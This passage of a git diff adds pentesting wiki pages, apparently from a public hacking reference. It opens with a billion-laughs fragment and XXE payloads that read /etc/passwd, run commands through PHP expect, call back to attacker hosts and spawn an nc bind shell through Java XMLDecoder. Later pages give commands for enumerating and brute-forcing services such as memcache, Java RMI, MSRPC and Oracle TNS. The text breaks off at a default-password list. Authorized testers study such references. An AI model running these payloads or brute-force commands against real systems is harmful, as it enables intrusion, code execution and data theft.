+c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
+d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
+e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
+f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
+g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
+h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
+i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
+```
+
+## Hidden XXE Surfaces
+
+### XInclude
+
+[From here.](https://portswigger.net/web-security/xxe)
+
+Some applications **receive client-submitted data, embed it on the server-side into an XML document, and then parse the document**. An example of this occurs when client-submitted data is placed into a **backend SOAP request**, which is then processed by the backend SOAP service.
+
+In this situation, you cannot carry out a classic XXE attack, because **you don't control the entire XML** document and so cannot define or modify a `DOCTYPE` element. However, you might be able to use `XInclude` instead. `XInclude` is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an `XInclude` attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
+
+To perform an `XInclude` attack, you need to reference the `XInclude` namespace and provide the path to the file that you wish to include. For example:
+
+```markup
+productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
+```
+
+### SVG - File Upload
+
+[From here.](https://portswigger.net/web-security/xxe)
+
+Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents. Examples of XML-based formats are office document formats like DOCX and image formats like SVG.
+
+For example, an application might allow users to **upload images**, and process or validate these on the server after they are uploaded. Even if the application expects to receive a format like PNG or JPEG, the **image processing library that is being used might support SVG images**. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.
+
+```markup
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"><image xlink:href="file:///etc/hostname"></image></svg>
+```
+
+You could also try to **execute commands** using the PHP "expect" wrapper:
+
+```markup
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
+    <image xlink:href="expect://ls"></image>
+</svg>
+```
+
+**Note the first line of the read file or of the result of the execution will appear INSIDE the created image. So you need to be able to access the image SVG has created.**
+
+### Content-Type: From x-www-urlencoded to XML
+
+If a POST request accepts the data in XML format, you could try to exploit a XXE in that request.
+
+```markup
+POST /action HTTP/1.0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 7
+
+foo=bar
+```
+
+```markup
+POST /hackingman HTTP/1.0
+Content-Type: text/html
+Content-Length: 7
+<?xml version="1.0" encoding="UTF-8"><cicada>3301</cicada>
+```
+
+### Content-Type: From JSON to XEE
+
+To change the request you could use a Burp Extension named “**Content Type Converter**“. [Here](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html) you can find this example:
+
+```markup
+Content-Type: application/json;charset=UTF-8
+ 
+{"root": {"root": {
+  "firstName": "Avinash",
+  "lastName": "",
+  "country": "United States",
+  "city": "ddd",
+  "postalCode": "ddd"
+}}}
+```
+
+```markup
+Content-Type: application/xml;charset=UTF-8
+ 
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]> 
+<root>
+ <root>
+  <firstName>&xxe;</firstName>
+  <lastName/>
+  <country>United States</country>
+  <city>ddd</city>
+  <postalCode>ddd</postalCode>
+ </root>
+</root>
+```
+
+Another example can be found [here](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2).
+
+## Other bypasses
+
+### Base64
+
+```markup
+<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
+```
+
+This only work if the XML server accepts the `data://` protocol.
+
+### UTF-7
+
+You can use the [**"Encode Recipe**" of cyberchef here ](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7%20%2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to transform to UTF-7.
+
+```markup
+<!xml version="1.0" encoding="UTF-7"?-->
++ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4-
+```
+
+```markup
+<?xml version="1.0" encoding="UTF-7"?>
++ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
++ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
++ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
+```
+
+## PHP Wrappers
+
+### Base64
+
+**Extract** _**index.php**_
+
+```markup
+<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
+```
+
+#### **Extract external resource**
+
+```markup
+<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3"> ]>
+```
+
+### Remote code execution
+
+**If PHP "expect" module is loaded**
+
+```markup
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [ <!ELEMENT foo ANY >
+<!ENTITY xxe SYSTEM "expect://id" >]>
+<creds>
+    <user>&xxe;</user>
+    <pass>mypass</pass>
+</creds>
+```
+
+## **SOAP - XEE**
+
+```markup
+<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
+```
+
+## RSS - XEE
+
+Valid XML with RSS format to exploit an XXE vulnerability.
+
+### Ping back
+
+Simple HTTP request to attackers server
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE title [ <!ELEMENT title ANY >
+<!ENTITY xxe SYSTEM "http://<AttackIP>/rssXXE" >]>
+<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
+<channel>
+<title>XXE Test Blog</title>
+<link>http://example.com/</link>
+<description>XXE Test Blog</description>
+<lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate>
+<item>
+<title>&xxe;</title>
+<link>http://example.com</link>
+<description>Test Post</description>
+<author>author@example.com</author>
+<pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate>
+</item>
+</channel>
+</rss>
+```
+
+### Read file
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE title [ <!ELEMENT title ANY >
+<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
+<channel>
+<title>The Blog</title>
+<link>http://example.com/</link>
+<description>A blog about things</description>
+<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
+<item>
+<title>&xxe;</title>
+<link>http://example.com</link>
+<description>a post</description>
+<author>author@example.com</author>
+<pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
+</item>
+</channel>
+</rss>
+```
+
+### Read source code
+
+Using PHP base64 filter
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE title [ <!ELEMENT title ANY >
+<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///challenge/web-serveur/ch29/index.php" >]>
+<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
+<channel>
+<title>The Blog</title>
+<link>http://example.com/</link>
+<description>A blog about things</description>
+<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
+<item>
+<title>&xxe;</title>
+<link>http://example.com</link>
+<description>a post</description>
+<author>author@example.com</author>
+<pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
+</item>
+</channel>
+</rss>
+```
+
+## Java XMLDecoder XEE to RCE
+
+XMLDecoder is a Java class that creates objects based on a XML message. If a malicious user can get an application to use arbitrary data in a call to the method **readObject**, he will instantly gain code execution on the server.
+
+### Using Runtime\(\).exec\(\)
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<java version="1.7.0_21" class="java.beans.XMLDecoder">
+ <object class="java.lang.Runtime" method="getRuntime">
+      <void method="exec">
+      <array class="java.lang.String" length="6">
+          <void index="0">
+              <string>/usr/bin/nc</string>
+          </void>
+          <void index="1">
+              <string>-l</string>
+          </void>
+          <void index="2">
+              <string>-p</string>
+          </void>
+          <void index="3">
+              <string>9999</string>
+          </void>
+          <void index="4">
+              <string>-e</string>
+          </void>
+          <void index="5">
+              <string>/bin/sh</string>
+          </void>
+      </array>
+      </void>
+ </object>
+</java>
+```
+
+### ProcessBuilder
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<java version="1.7.0_21" class="java.beans.XMLDecoder">
+  <void class="java.lang.ProcessBuilder">
+    <array class="java.lang.String" length="6">
+      <void index="0">
+        <string>/usr/bin/nc</string>
+      </void>
+      <void index="1">
+         <string>-l</string>
+      </void>
+      <void index="2">
+         <string>-p</string>
+      </void>
+      <void index="3">
+         <string>9999</string>
+      </void>
+      <void index="4">
+         <string>-e</string>
+      </void>
+      <void index="5">
+         <string>/bin/sh</string>
+      </void>
+    </array>
+    <void method="start" id="process">
+    </void>
+  </void>
+</java>
+```
+
+## Tools
+
+{% embed url="https://github.com/luisfontes19/xxexploiter" %}
+
+## More resources
+
+[https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)  
+[https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html](https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html)  
+Extract info via HTTP using own external DTD: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)  
+[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection)  
+[https://gist.github.com/staaldraad/01415b990939494879b4](https://gist.github.com/staaldraad/01415b990939494879b4)  
+[https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9](https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9)  
+[https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)
+
diff --git a/pentesting/10000-network-data-management-protocol-ndmp.md b/pentesting/10000-network-data-management-protocol-ndmp.md
new file mode 100644
index 00000000..0cf7485d
--- /dev/null
+++ b/pentesting/10000-network-data-management-protocol-ndmp.md
@@ -0,0 +1,24 @@
+# 10000 - Pentesting Network Data Management Protocol \(ndmp\)
+
+## **Protocol Information**
+
+**NDMP**, or **Network Data Management Protocol**, is a protocol meant to transport data between network attached storage \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) devices and [backup](https://en.wikipedia.org/wiki/Backup) devices. This removes the need for transporting the data through the backup server itself, thus enhancing speed and removing load from the backup server.  
+From [Wikipedia](https://en.wikipedia.org/wiki/NDMP).
+
+**Default port:** 10000
+
+```text
+PORT      STATE SERVICE REASON  VERSION
+10000/tcp open  ndmp    syn-ack Symantec/Veritas Backup Exec ndmp
+```
+
+## **Enumeration**
+
+```bash
+nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 <IP> #Both are default scripts
+```
+
+### Shodan
+
+`ndmp`
+
diff --git a/pentesting/1026-pentesting-rusersd.md b/pentesting/1026-pentesting-rusersd.md
new file mode 100644
index 00000000..9fb2acdb
--- /dev/null
+++ b/pentesting/1026-pentesting-rusersd.md
@@ -0,0 +1,19 @@
+# 1026 - Pentesting Rusersd
+
+## Basic Information
+
+This protocol will provide you the usernames of the host. You may be able to find this services listed by the port-mapper service like this:
+
+![](../.gitbook/assets/image%20%2814%29.png)
+
+### Enumeration
+
+```text
+root@kali:~# apt-get install rusers
+root@kali:~# rusers -l 192.168.10.1
+Sending broadcast for rusersd protocol version 3...
+Sending broadcast for rusersd protocol version 2...
+tiff       potatohead:console         Sep  2 13:03   22:03
+katykat    potatohead:ttyp5           Sep  1 09:35      14
+```
+
diff --git a/pentesting/1099-pentesting-java-rmi.md b/pentesting/1099-pentesting-java-rmi.md
new file mode 100644
index 00000000..04c52a9b
--- /dev/null
+++ b/pentesting/1099-pentesting-java-rmi.md
@@ -0,0 +1,41 @@
+# 1098/1099 - Pentesting Java RMI
+
+## Basic Information
+
+The Java Remote Method Invocation, or Java RMI, is a mechanism that allows an object that exists in one Java virtual machine to access and call methods that are contained in another Java virtual machine; This is basically the same thing as a [remote procedure call](https://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp-0134709/), but in an object-oriented paradigm instead of a procedural one, which allows for communication between Java programs that are not in the same address space.
+
+One of the major advantages of RMI is the ability for remote objects to load new classes that aren't explicitly defined already, extending the behavior and functionality of an application.  
+From [here](https://null-byte.wonderhowto.com/how-to/exploit-java-remote-method-invocation-get-root-0187685/).
+
+**Default port:** 1099, 1098
+
+```text
+PORT     STATE SERVICE     REASON
+1099/tcp open  rmiregistry syn-ack
+```
+
+## Enumeration
+
+The default configuration of `rmiregistry`allows loading classes from remote URLs, which can lead to remote code execution.
+
+**Basically this service could allow you to execute code.**
+
+```bash
+msf> use auxiliary/scanner/misc/java_rmi_server
+msf> use auxiliary/gather/java_rmi_registry
+nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p <PORT> <IP>
+```
+
+### RMI methods enumeration
+
+[https://github.com/BishopFox/rmiscout](https://github.com/BishopFox/rmiscout) to explore and try to find RCE vulnerabilities.  
+[https://github.com/NickstaDB/BaRMIe](https://github.com/NickstaDB/BaRMIe) to enumerate and attack
+
+## Reverse Shell
+
+### MSF
+
+```bash
+msf> use exploit/multi/browser/java_rmi_connection_impl
+```
+
diff --git a/pentesting/11211-memcache.md b/pentesting/11211-memcache.md
new file mode 100644
index 00000000..3c5017cc
--- /dev/null
+++ b/pentesting/11211-memcache.md
@@ -0,0 +1,52 @@
+# 11211 - Pentesting Memcache
+
+## Protocol Information
+
+**Memcached** \(pronunciation: mem-cashed, mem-cash-dee\) is a general-purpose distributed [memory caching](https://en.wikipedia.org/wiki/Memory_caching) system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source \(such as a database or API\) must be read. \(From [wikipedia](https://en.wikipedia.org/wiki/Memcached)\)  
+Although Memcached supports SASL, most instances are **exposed without authentication**.
+
+**Default port:** 11211
+
+```text
+PORT      STATE SERVICE
+11211/tcp open  unknown
+```
+
+## Enumeration
+
+### Manual
+
+To ex-filtrate all the information saved inside a memcache instance you need to:
+
+1. Find **slabs** with **active items**
+2. Get the **key names** of the slabs detected before
+3. Ex-filtrate the **saved data** by **getting the key names**
+
+Remember that this service is just a **cache**, so **data may be appearing and  disappearing**.
+
+```bash
+echo "version" | nc -vn <IP> 11211      #Get version
+echo "stats" | nc -vn <IP> 11211        #Get status
+echo "stats slabs" | nc -vn <IP> 11211  #Get slabs
+echo "stats items" | nc -vn <IP> 11211  #Get items of slabs with info
+echo "stats cachedump <number> 0" | nc -vn <IP> 11211  #Get key names
+echo "get <item_name>" | nc -vn <IP> 11211  #Get saved info
+
+#This php will just dumo the keys, you need to use "get <item_name> later"
+sudo apt-get install php-memcached
+php -r '$c = new Memcached(); $c->addServer("localhost", 11211); var_dump( $c->getAllKeys() );'
+```
+
+### Automatic
+
+```bash
+nmap -n -sV --script memcached-info -p 11211 <IP>   #Just gather info
+msf > use auxiliary/gather/memcached_extractor      #Extracts saved data
+msf > use auxiliary/scanner/memcached/memcached_amp #Check is UDP DDoS amplification attack is possible 
+```
+
+### **Shodan**
+
+* `port:11211 "STAT pid"`
+* `"STAT pid"`
+
diff --git a/pentesting/113-pentesting-ident.md b/pentesting/113-pentesting-ident.md
new file mode 100644
index 00000000..c84f1375
--- /dev/null
+++ b/pentesting/113-pentesting-ident.md
@@ -0,0 +1,58 @@
+# 113 - Pentesting Ident
+
+## Basic Information
+
+Is an [Internet](https://en.wikipedia.org/wiki/Internet) [protocol](https://en.wikipedia.org/wiki/Protocol_%28computing%29) that helps identify the user of a particular [TCP](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) connection.
+
+**Default port:** 113
+
+```text
+PORT    STATE SERVICE
+113/tcp open  ident
+```
+
+## **Enumeration**
+
+### **Manual - Get user/Identify the service**
+
+If a machine is running the service ident and samba \(445\) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing:
+
+![](../.gitbook/assets/image%20%2877%29.png)
+
+If you just press enter when you conenct to the service:
+
+![](../.gitbook/assets/image%20%28176%29.png)
+
+Other errors:
+
+![](../.gitbook/assets/image%20%28268%29.png)
+
+
+
+### Nmap
+
+By default \(-sC\) nmap will identify every user of every running port:
+
+```text
+PORT    STATE SERVICE     VERSION
+22/tcp  open  ssh         OpenSSH 4.3p2 Debian 9 (protocol 2.0)
+|_auth-owners: root
+| ssh-hostkey: 
+|   1024 88:23:98:0d:9d:8a:20:59:35:b8:14:12:14:d5:d0:44 (DSA)
+|_  2048 6b:5d:04:71:76:78:56:96:56:92:a8:02:30:73:ee:fa (RSA)
+113/tcp open  ident
+|_auth-owners: identd
+139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCAL)
+|_auth-owners: root
+445/tcp open  netbios-ssn Samba smbd 3.0.24 (workgroup: LOCAL)
+|_auth-owners: root
+```
+
+### Shodan
+
+* `oident`
+
+## Files
+
+identd.conf
+
diff --git a/pentesting/135-penstesting-msrpc.md b/pentesting/135-penstesting-msrpc.md
new file mode 100644
index 00000000..1dcf5145
--- /dev/null
+++ b/pentesting/135-penstesting-msrpc.md
@@ -0,0 +1,72 @@
+# 135, 593 - Penstesting MSRPC
+
+## Basic Information
+
+Microsoft Remote Procedure Call, also known as a function call or a subroutine call, is [a protocol](http://searchmicroservices.techtarget.com/definition/Remote-Procedure-Call-RPC) that uses the client-server model in order to allow one program to request service from a program on another computer without having to understand the details of that computer's network. MSRPC was originally derived from open source software but has been developed further and copyrighted by Microsoft.
+
+Depending on the host configuration, the RPC endpoint mapper can be accessed through TCP and UDP port 135, via SMB with a null or authenticated session \(TCP 139 and 445\), and as a web service listening on TCP port 593.
+
+```text
+135/tcp   open     msrpc         Microsoft Windows RPC
+```
+
+## How does MSRPC work?
+
+[The MSRPC process begins on the client side](https://technet.microsoft.com/en-us/library/cc738291.aspx), with the client application calling a local stub procedure instead of code implementing the procedure. The client stub code retrieves the required parameters from the client address space and delivers them to the client runtime library, which then translates the parameters into a standard Network Data Representation format to transmit to the server.
+
+The client stub then calls functions in the RPC client runtime library to send the request and parameters to the server. If the server is located remotely, the runtime library specifies an appropriate transport protocol and engine and passes the RPC to the network stack for transport to the server.  
+From here: [https://www.extrahop.com/resources/protocols/msrpc/](https://www.extrahop.com/resources/protocols/msrpc/)
+
+![](../.gitbook/assets/image%20%28165%29.png)
+
+**Image From book "**_**Network Security Assesment 3rd Edition**_**"**
+
+## **Identifying Exposed RPC Services**
+
+**Section extracted from book "**_**Network Security Assesment 3rd Edition**_**"**
+
+You can query the RPC locator service and individual RPC endpoints to catalog interesting services running over TCP, UDP, HTTP, and SMB \(via named pipes\). Each IFID value gathered through this process denotes an RPC service \(e.g., 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc is the Messenger interface\).
+
+Todd Sabin’s rpcdump and ifids Windows utilities query both the RPC locator and specific RPC endpoints to list IFID values. The rpcdump syntax is as follows:
+
+```text
+D:\rpctools> rpcdump [-p port] 192.168.189.1
+IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
+Annotation: Messenger Service
+UUID: 00000000-0000-0000-0000-000000000000
+Binding: ncadg_ip_udp:192.168.189.1[1028]
+```
+
+You can access the RPC locator service by using four protocol sequences:
+
+* ncacn\_ip\_tcp and ncadg\_ip\_udp \(TCP and UDP port 135\)
+* ncacn\_np \(the \pipe\epmapper named pipe via SMB\)
+* ncacn\_http \(RPC over HTTP via TCP port 80, 593, and others\)
+
+```bash
+use auxiliary/scanner/dcerpc/endpoint_mapper
+use auxiliary/scanner/dcerpc/hidden
+use auxiliary/scanner/dcerpc/management
+use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
+rpcdump.py <IP> -p 135
+```
+
+_Note that from the mentioned options all except of **`tcp_dcerpc_auditor`** can **only** be executed against **msrpc** in **port 135**._
+
+#### Notable RPC interfaces
+
+| **IFID value** | **Named pipe** | **Description** |
+| :--- | :--- | :--- |
+| 12345778-1234-abcd-ef00-0123456789ab | \pipe\lsarpc | LSA interface, used to enumerate users |
+| 3919286a-b10c-11d0-9ba8-00c04fd92ef5 | \pipe\lsarpc | LSA Directory Services \(DS\) interface, used to enumerate domains and trust relationships |
+| 12345778-1234-abcd-ef00-0123456789ac | \pipe\samr | LSA SAMR interface, used to access public SAM database elements \(e.g., usernames\) and brute-force user passwords regardless of account lockout policy[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#idm139659172852688) |
+| 1ff70682-0a51-30e8-076d-740be8cee98b | \pipe\atsvc | Task scheduler, used to remotely execute commands |
+| 338cd001-2244-31f1-aaaa-900038001003 | \pipe\winreg | Remote registry service, used to access the system registry |
+| 367abb81-9844-35f1-ad32-98f038001003 | \pipe\svcctl | Service control manager and server services, used to remotely start and stop services and execute commands |
+| 4b324fc8-1670-01d3-1278-5a47bf6ee188 | \pipe\srvsvc | Service control manager and server services, used to remotely start and stop services and execute commands |
+| 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 | \pipe\epmapper | DCOM interface, supporting WMI |
+
+## Port 593
+
+The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) can interact with this port.
+
diff --git a/pentesting/137-138-139-pentesting-netbios.md b/pentesting/137-138-139-pentesting-netbios.md
new file mode 100644
index 00000000..6573d7f8
--- /dev/null
+++ b/pentesting/137-138-139-pentesting-netbios.md
@@ -0,0 +1,57 @@
+# 137,138,139 - Pentesting NetBios
+
+## NetBios Name Service
+
+* Name service for name registration and resolution \(ports: 137/udp and 137/tcp\).
+* Datagram distribution service for connectionless communication \(port: 138/udp\).
+* Session service for connection-oriented communication \(port: 139/tcp\).
+
+### Name Service
+
+Every machine should have a name inside the NetBios network. To request a name, a machine should send a "Name Query" packet in broadcast and if anyone answer that it is already using that name, the machine can use that name. If there is a Name Service server, the computer could ask the Name Service server if someone is using the name that it wants to use.
+
+To discover the IP address of a Name, a PC has to send a "Name Query" packet and wait if anyone answers. If there is a Name Service server, the PC can ask it for the IP of the name.
+
+```bash
+PORT    STATE SERVICE    VERSION
+137/udp open  netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
+```
+
+Enumerating a NetBIOS service you can obtain the names the server is using and the MAC address of the server.
+
+```bash
+nmblookup -A <IP>
+nbtscan <IP>/30
+sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n <IP>
+```
+
+### Datagram Distribution Service
+
+NetBIOS datagrams are sent over UDP. A datagram is sent with a "Direct Unique" or "Direct Group" packet if it's being sent to a particular NetBIOS name, or a "Broadcast" packet if it's being sent to all NetBIOS names on the network.
+
+```bash
+PORT    STATE         SERVICE     VERSION
+138/udp open|filtered netbios-dgm
+```
+
+### Session Service
+
+Session mode lets two computers establish a connection for a "conversation", allows larger messages to be handled, and provides error detection and recovery.
+
+Sessions are established by exchanging packets. The computer establishing the session attempts to make a [TCP](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) connection to port 139 on the computer with which the session is to be established. If the connection is made, the computer establishing the session then sends over the connection a "Session Request" packet with the NetBIOS names of the application establishing the session and the NetBIOS name to which the session is to be established. The computer with which the session is to be established will respond with a "Positive Session Response" indicating that a session can be established or a "Negative Session Response" indicating that no session can be established \(either because that computer isn't listening for sessions being established to that name or because no resources are available to establish a session to that name\).
+
+Data is transmitted during an established session by Session Message packets.
+
+TCP handles flow control and retransmission of all session service packets, and the dividing of the data stream over which the packets are transmitted into [IP](https://en.wikipedia.org/wiki/Internet_Protocol) datagrams small enough to fit in link-layer packets.
+
+Sessions are closed by closing the TCP connection.
+
+```bash
+PORT      STATE SERVICE      VERSION
+139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
+```
+
+**Read the next page to learn how to enumerate this service:**
+
+{% page-ref page="pentesting-smb.md" %}
+
diff --git a/pentesting/1521-1522-1529-pentesting-oracle-listener/README.md b/pentesting/1521-1522-1529-pentesting-oracle-listener/README.md
new file mode 100644
index 00000000..72862214
--- /dev/null
+++ b/pentesting/1521-1522-1529-pentesting-oracle-listener/README.md
@@ -0,0 +1,264 @@
+# 1521,1522-1529 - Pentesting Oracle TNS Listener
+
+## Basic Information
+
+Oracle database \(Oracle DB\) is a relational database management system \(RDBMS\) from the Oracle Corporation \(from [here](https://www.techopedia.com/definition/8711/oracle-database)\).
+
+When enumerating Oracle the first step is to talk to the TNS-Listener that usually resides on the default port \(1521/TCP, -you may also get secondary listeners on 1522–1529-\).
+
+```text
+1521/tcp open  oracle-tns    Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)
+1748/tcp open  oracle-tns    Oracle TNS Listener
+```
+
+## Summary
+
+1. **Enumerate version** info \(search for **known vulns**\)
+2. **Bruteforce TNS listener** communication \(not always needed\)
+3. **Enumerate**/Bruteforce **SID names** \(like database names\)
+4. **Bruteforce credentials** for valid SID name discovered
+5. Try to **execute code** 
+
+In order to user MSF oracle modules you need to install some dependencies: ****[**Installation**](oracle-pentesting-requirements-installation.md)\*\*\*\*
+
+## Enumeration
+
+Tools that can be used for this are: nmap, MSF and [tnscmd10g](http://dokfleed.net/files/audit/tnscmd10g.zip).
+
+### TNS listener version
+
+```bash
+nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
+msf> use auxiliary/scanner/oracle/tnslsnr_version
+tnscmd10g version -p 1521 -h <IP>
+```
+
+Other useful TNS listener commands:
+
+| **Command** | **Purpose** |
+| :--- | :--- |
+| ping | Ping the listener |
+| version | Provide output of the listener version and platform information |
+| status | Return the current status and variables used by the listener |
+| services | Dump service data |
+| debug | Dump debugging information to the listener log |
+| reload | Reload the listener configuration file |
+| save\_config | Write the listener configuration file to a backup location |
+| stop | Invoke listener shutdown |
+
+If you **receive an error**, could be because **TNS versions are incompatible** \(Use the `--10G` parameter with `tnscmd10`\) and if the **error persist,** the listener may be **password protected** \(you can see a list were all the [**errors are detailed here**](https://docs.oracle.com/database/121/ERRMG/TNS-00000.htm#ERRMG-GUID-D723D931-ECBA-4FA4-BF1B-1F4FE2EEBAD7)\) — don't worry… hydra to the rescue**:**
+
+```text
+hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener
+```
+
+The TNS listener could be vulnerable to **MitM** attacks. [Check here how to check if the server is vulnerable and how to perform the attack \(all versions up to version 12c are\)](tns-poison.md).
+
+### SID enumeration
+
+#### **What is a SID**
+
+The SID \(Service Identifier\) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.
+
+**In some old versions \(in 9 it works\)** you could ask for the SID and the database send it to you:
+
+```text
+tnscmd10g status-p 1521 -h <IP> #The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
+
+#msf1
+msf> use auxiliary/scanner/oracle/sid_enum
+msf> set rhost <IP>
+msf> run
+#msf2
+msf> use auxiliary/admin/oracle/tnscmd
+msf> set CMD (CONNECT_DATA=(COMMAND=STATUS))
+msf> set rhost <IP>
+msf> run #The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
+```
+
+If you cant access this way to the SIDs you will need to bruteforce them:
+
+**SID Bruteforce**
+
+I have merged the nmap and MSF sid lists into this one \(without duplicates\):
+
+{% file src="../../.gitbook/assets/sids-oracle.txt" %}
+
+```text
+hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 <IP> oracle-sid
+patator oracle_login host=<IP> sid=FILE0 0=sids-oracle.txt -x ignore:code=ORA-12505
+./odat.py sidguesser -s $SERVER -d $SID --sids-file=./sids.txt
+msf> use auxiliary/admin/oracle/sid_brute #This will use the list located at /usr/share/metasploit-framework/data/wordlists/sid.txt
+nmap --script +oracle-sid-brute -p 1521 10.11.1.202 #This will use the list lcated at /usr/share/nmap/nselib/data/oracle-sids
+```
+
+In order to use **oracle\_login** with **patator** you need to **install**:
+
+```text
+pip3 install cx_Oracle --upgrade
+```
+
+## **Targeting Accounts**
+
+**Got SID?** Excellent, now let’s move to the next task and extract the user account information. From this point, you can connect to the listener and brute-force credentials.
+
+**Metasploit** _****scanner/oracle/oracle\_login_ It has a built-in dictionary for the **most popular default values of user account** information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle.
+
+**Nmap** can also help here with the script _oracle-brute_. Note that this script **mixes the logins and passwords**, that is, it tries each login against every password, and it takes quite a while!
+
+### **Default Passwords**
+
+Below are some of the default passwords associated with Oracle:
+
